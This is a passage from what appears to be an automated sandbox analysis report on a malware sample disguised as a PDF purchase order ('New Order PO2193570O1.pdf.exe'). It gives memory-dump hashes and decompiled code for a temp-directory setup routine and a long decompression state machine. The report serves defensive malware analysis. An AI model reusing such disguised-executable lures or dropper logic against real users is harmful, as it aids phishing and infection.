                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                                              • Opcode ID: b7b8cb8f653de01b59ee712a592e9b9154298079c484abbc49abeddd07189c0d
                                                                                                                              • Instruction ID: 3155fc2f10b9eac5ff04d01206026f371211fd96ff78a862097b4cbe64904253
                                                                                                                              • Opcode Fuzzy Hash: b7b8cb8f653de01b59ee712a592e9b9154298079c484abbc49abeddd07189c0d
                                                                                                                              • Instruction Fuzzy Hash: 3541C072004208DACB01AF64CDC5B9D37AEFF05238F948539F9069A296DF7C9845DBA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                              0x00403209
                                                                                                                              0x0040320f
                                                                                                                              0x00403215
                                                                                                                              0x0040321c
                                                                                                                              0x00403221
                                                                                                                              0x00403229
                                                                                                                              0x00403235
                                                                                                                              0x0040323b
                                                                                                                              0x0040321f
                                                                                                                              0x0040321f
                                                                                                                              0x0040321f

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                                • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 4115351271-1075807775
                                                                                                                              • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                                              • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                                              • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                                              • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 99%
                                                                                                                              			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
